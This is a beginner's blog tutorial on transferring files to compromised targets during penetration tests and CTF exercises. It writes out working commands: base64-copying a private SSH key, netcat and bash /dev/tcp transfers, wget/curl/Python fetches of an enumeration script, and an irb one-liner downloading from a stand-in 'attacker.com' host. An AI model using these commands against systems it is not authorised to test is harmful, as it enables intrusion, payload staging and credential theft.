File Transfer Essentials: How to move files between hosts while penetration testing

September 13, 2023
September 13, 2023 Jasper

In this article I will cover the basics of file transfers between your attacker machine and the target, a fundamental part of every penetration test.

I am making these walkthroughs to keep myself motivated to learn cyber security, and to share my journey  🙂
Join me on learning cyber security. I will try and explain concepts as I go.

Introduction to file transfers

As a beginner in the realm of pentesting, you will probably have started playing around with some CTFs on TryHackMe, HackTheBox or something completely different. Something that will be a part of  nearly every challenge is getting some scripts or files over to your target, as the target machine won’t have all your awesome hacker tools available! There are a lot of different ways to do this, and it all depends on your target. If you are lucky you can use one of the easier methods, but your target machine might block http transfer which means you need to use a service on a different port of some kind.

I will cover a plethora of methods and techniques to transfer files to your target, and while doing this I will try to cover the easier methods first. I will keep my focus on Linux system, but the same methods are possible on Windows hosts with Powershell.

Let’s get going!

Transferring files

What are you waiting for?

Base64

The absolute easiest way to transfer files is to base64 them. For those new to base64, it is a binary-to-text encoding scheme which allows you to convert files to text strings. This makes it possible to copy and paste programs, just as you would copy and paste text in your favorite word processor. The steps for transfer a private id_rsa key are as follows:

  1.  Before encoding the binary it is a great idea to check the md5 sum of the file before base64 encoding it, so you can ensure that the file is exactly the same when decoding it on the target.
    md5sum id_rsa
  2.  Base64 encode by using the following command:
    cat id_rsa |base64 -w 0;echo
  3. You can then simply copy and paste the outputted string, and copy it into the terminal of your target machine:
    echo -n <copied base64 string> | base64 -d > id_rsa
  4. Now check the md5 sum by simply running:
    md5sum id_rsa

Downloading

Sometimes you can simply download the required files from github, and popular tools to use for this are wget and cURL. An alternative is hosting a web server on your attacker machine and using wget or cURL to download from your own machine, but this will be covered in a bit, and the commands from the target machine are the same.

wget

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

cURL

curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Programming Languages

There might come situation where you can’t use either wget or cURL. But you might get lucky and find out there are programming languages installed on the system. This means you can write a simply script to download files, whether that is in Python, Ruby, Javascript or something completely different! Here is an example for Python:

python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

This is only an example of course. There will be many different ways to do this, using different Python libraries, or using different programming languages.

Netcat

You know know netcat from using it to setup up bind and reverse shells. Well, you can use it to use send files as well. Let’s say you want to transfer a binary.exe file to the target. You start by setting up a listener on the target machine like so:

nc -l -p 8000 > binary.exe

On your own machine you run:

nc -q 0 192.168.51.130 8000 < binary.exe

The important thing here is to set the IP address to the target IP address.

Alternative

Sometimes get, cURL and netcat are not available on the target machine and neither are any programming languages. This means you need to find some alternatives way to transfer your files. Luckily, it is also possible to download with Base (versions greater than 2.04). You don’t need to understand this, but just know that it might be an opportunity.

exec 3<>/dev/tcp/10.10.10.32/80

echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

cat <&3

Web Server

Since Linux distributions have Python installed, which makes starting a web server to transfer files is straightforward. Also, if the server we compromised is a web server, we can move the files we want to transfer to the web server directory and access them from the web page. Depending on your version of Python you can use the following commands:

Python 3

python -m http.server

Python 2.7

python -m SimpleHTTPServer

No matter the version, we can then fetch the files from your local webserver by using wget or cURL:

wget 192.168.49.128:80/secret.txt

Make sure you use the correct port, as sometimes a different port can be assigned, if port 80 is already in use.

SSH Downloads

If we have a SSH service running on the target or attacker host we can use scp to securely transfer files over the SSH protocol. The syntax is quite similar to the regular cp (copy) command.

scp <file name> <remote user>@10.10.0.2:/<remote dir>

An example could be as follows:

scp passwords.txt admin@192.168.49.128:/root/myroot.txt

This copies your file to the target machine. Of course the opposite way around is also possible if you want to fetch a file from a remote server!

Local Binaries

Ever heard of the term “living of the land”?

It means using binaries found on the target machine and use them for other things than they were meant to. In relation to this article, some binaries can be used to transfer files without needing any of the other techniques. Binaries that can be used for this are listed on a great website called GTFOBins for Linux. You can use the site to search for a binary you found on the target, to see if it allows for file download/upload. An example is irb: https://gtfobins.github.io/gtfobins/irb/. Note that under file download and upload it instructs you how to use this tool to for unintended purposes.

The specifics are to detailed to cover here, but in the case of irb you can use the following commands:

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
irb
require 'open-uri'; download = open(ENV['URL']); IO.copy_stream(download, ENV['LFILE'])

A note on uploading files

One last thing I want to mention is that you can use many of the different techniques covered in this article to upload files from your target machine to your attacker host. This works in a very similar way, and I have decided not to cover this as I really want to keep these Essential series articles as brief as possible. Let me know if you disagree with this 🙂

But anyway, we are done for now! I hope you learned a lot about file transfers. If you learn one thing from this article it is that there are so many way to transfer files around between the machines. Some tools and techniques might be blocked, but remember there are always other tools out there that might be able to circumvent defensive measures. Keep trying and keep learning! You’re awesome!

Like my articles?

 It was great fun to write this summary. If you want you can leave me a clap or two 🙂

You are also welcome to support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: